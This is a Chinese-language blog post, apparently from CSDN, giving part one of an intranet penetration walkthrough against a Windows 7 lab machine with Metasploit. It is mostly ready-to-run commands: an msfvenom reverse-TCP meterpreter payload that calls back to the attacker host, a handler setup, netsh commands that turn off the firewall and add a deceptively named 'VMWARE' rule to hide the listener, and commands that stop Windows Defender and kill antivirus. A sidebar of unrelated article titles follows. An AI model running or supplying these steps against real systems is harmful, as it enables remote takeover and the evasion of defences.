当前位置:网站首页>内网渗透之内网信息收集(一)
内网渗透之内网信息收集(一)
2022-07-06 09:22:00 【不知名白帽】
目录
内网渗透之内网信息收集(二)_不知名白帽的博客-CSDN博客
Metasploit内网信息收集
攻击机 kali 192.168.0.103
靶机 win7 192.168.0.105
01msf反弹shell
首先生成一个payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f exe > shell.exe

02msf反弹shell
配置反弹会话处理程序
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 4444
exploit

将payload发送到目标机器让其执行

执行成功

linux无法识别window汉字会乱码,修改一下代码页(65001代表的是UTF-8)

03通过shell关闭防火墙
shell(execute -f cmd -i -H)
netsh advfirewall set allprofiles state off (关闭防火墙)
netsh advfirewall show allprofiles (查看防火墙状况)

通过策略添加防火墙规则隐蔽行为
netsh advfirewall set add rule name= "VMWARE" protocol=TCP dir=in localport=4444 action=allow
netsh firewall add portopening TCP 4444 "VMWARE" ENABLE ALL
重启生效(令win7重启):
shutdown -r -f -t 0
04关闭杀毒软件
关闭windefend
net stop windefend
关闭杀毒软件
run killav
run post/windows/manage/killav
边栏推荐
- xray与burp联动 挖掘
- Wei Shen of Peking University revealed the current situation: his class is not very good, and there are only 5 or 6 middle-term students left after leaving class
- HackMyvm靶机系列(6)-videoclub
- SRC挖掘思路及方法
- 力扣152题乘数最大子数组
- Wechat applet
- 7-8 7104 约瑟夫问题(PTA程序设计)
- 【数据库 三大范式】一看就懂
- 7-1 输出2到n之间的全部素数(PTA程序设计)
- HackMyvm靶机系列(4)-vulny
猜你喜欢

HackMyvm靶機系列(3)-visions

Write a program to simulate the traffic lights in real life.

Canvas foundation 2 - arc - draw arc

SRC mining ideas and methods

强化学习基础记录

Strengthen basic learning records

It's never too late to start. The tramp transformation programmer has an annual salary of more than 700000 yuan

Reinforcement learning series (I): basic principles and concepts

Hackmyvm target series (7) -tron

Record a penetration of the cat shed from outside to inside. Library operation extraction flag
随机推荐
附加简化版示例数据库到SqlServer数据库实例中
7-7 7003 combination lock (PTA program design)
Experiment 4 array
HackMyvm靶机系列(3)-visions
FAQs and answers to the imitation Niuke technology blog project (III)
[data processing of numpy and pytoch]
UGUI—Text
PriorityQueue (large root heap / small root heap /topk problem)
1. Preliminary exercises of C language (1)
3. Input and output functions (printf, scanf, getchar and putchar)
Matlab opens M file garbled solution
【黑马早报】上海市监局回应钟薛高烧不化;麦趣尔承认两批次纯牛奶不合格;微信内测一个手机可注册俩号;度小满回应存款变理财产品...
7-5 走楼梯升级版(PTA程序设计)
7-9 制作门牌号3.0(PTA程序设计)
Strengthen basic learning records
"Gold, silver and four" job hopping needs to be cautious. Can an article solve the interview?
TypeScript快速入门
实验七 常用类的使用(修正帖)
Principles, advantages and disadvantages of two persistence mechanisms RDB and AOF of redis
The United States has repeatedly revealed that the yield of interest rate hiked treasury bonds continued to rise